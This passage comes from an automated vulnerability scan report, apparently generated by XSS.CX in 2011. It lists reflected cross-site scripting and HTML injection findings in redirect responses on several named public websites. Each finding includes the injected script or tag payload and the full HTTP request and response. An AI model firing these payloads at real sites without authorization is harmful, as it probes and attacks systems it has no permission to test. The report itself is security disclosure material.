Request

GET /?c4454<script>alert(1)</script>825772b2f33=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1
Date: Sat, 02 Apr 2011 15:13:14 GMT
Content-Length: 193

The URL has moved to <a href="http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1">http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1</a>

2.106. http://www.force.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.force.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e588e"><script>alert(1)</script>d061efa9f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?e588e"><script>alert(1)</script>d061efa9f5e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.force.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1
Date: Sat, 02 Apr 2011 15:13:13 GMT
Content-Length: 197

The URL has moved to <a href="http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1">http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1</a>

2.107. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationalcar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 39c01</title><a>81980736ddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?39c01</title><a>81980736ddf=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalcar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.nationalcar.com/?39c01</title><a>81980736ddf=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4530d50c5c8ad755ba483589e0d7ae2da80063.e34QbxeQbNqKci0Mah4Nbx0RaNaOe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144116293444167597,0)
Content-Length: 255
Date: Sat, 02 Apr 2011 15:49:13 GMT

<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?39c01</title><a>81980736ddf=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?39c01</title><a>81980736ddf=1">https://www.nationalc
...[SNIP]...

2.108. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationalcar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f55f"><a>e5ae426b094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?8f55f"><a>e5ae426b094=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalcar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4430d50f48ceccb36744208f57acfc820ce310.e34QbxeKax4RaO0Ma3aRbheLa3mRe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115627724201600,0)
Content-Length: 237
Date: Sat, 02 Apr 2011 15:48:39 GMT

<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1">https://www.nationalcar.com/?8f55
...[SNIP]...

2.109. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationalcar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0438<a>5e02ce9b27a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?e0438<a>5e02ce9b27a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalcar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1
Content-Type: text/html
Set-Cookie: JSESSIONID=0aa0fd4330d5fd1189c720f140cbb4e5ec2a8ea21f04.e34QbxaNbxmNbO0LbxqQah0QaNyNe0; path=/; secure
Server: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115516055069584,0)
Content-Length: 231
Date: Sat, 02 Apr 2011 15:48:56 GMT

<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1">https://www.nationalcar.com/?e0438<a>5e02ce9b27a=1</A>
...[SNIP]...

2.110. http://www.opinionoutpost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opinionoutpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c079"><script>alert(1)</script>8e52f6bccae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?8c079"><script>alert(1)</script>8e52f6bccae=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opinionoutpost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 261
Location: https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://www.opinionoutpost.com:443/?8c079"><script>alert(1)</script>8e52f6bccae=1">
...[SNIP]...

2.111. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radioshackwireless.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52414"><script>alert(1)</script>50f07126836 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?52414"><script>alert(1)</script>50f07126836=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radioshackwireless.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 15:37:52 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 251
Location: http://radioshackwireless.com/?52414"><script>alert(1)</script>50f07126836=1

<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?52414"><script>alert(1)</script>50f07126836=1">http://radioshackwireless.com/?52414"><scri
...[SNIP]...

2.112. http://www.radioshackwireless.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radioshackwireless.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e774e<script>alert(1)</script>694eb393332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?e774e<script>alert(1)</script>694eb393332=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radioshackwireless.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 15:37:52 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 247
Location: http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1

<html><body>The requested resource was moved. It could be found here: <a href="http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1">http://radioshackwireless.com/?e774e<script>alert(1)</script>694eb393332=1</a>
...[SNIP]...

2.113. http://www.yadro.ru/ [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yadro.ru
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe25"><script>alert(1)</script>17a24794658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?8fe25"><script>alert(1)</script>17a24794658=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yadro.ru
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: 0W/0.6
Date: Sat, 02 Apr 2011 15:17:32 GMT
Content-Type: text/html
Location: http://members.yadro.ru/?8fe25"><script>alert(1)</script>17a24794658=1
Content-Length: 336
Connection: Close

<html><head><title>[302] Moved Temporarily</title></head>
<body><h3>Moved Temporarily</h3>
This document has moved <a href="http://members.yadro.ru/?8fe25"><script>alert(1)</script>17a24794658=1">here
...[SNIP]...

Report generated by XSS.CX at Sat Apr 02 11:20:54 CDT 2011.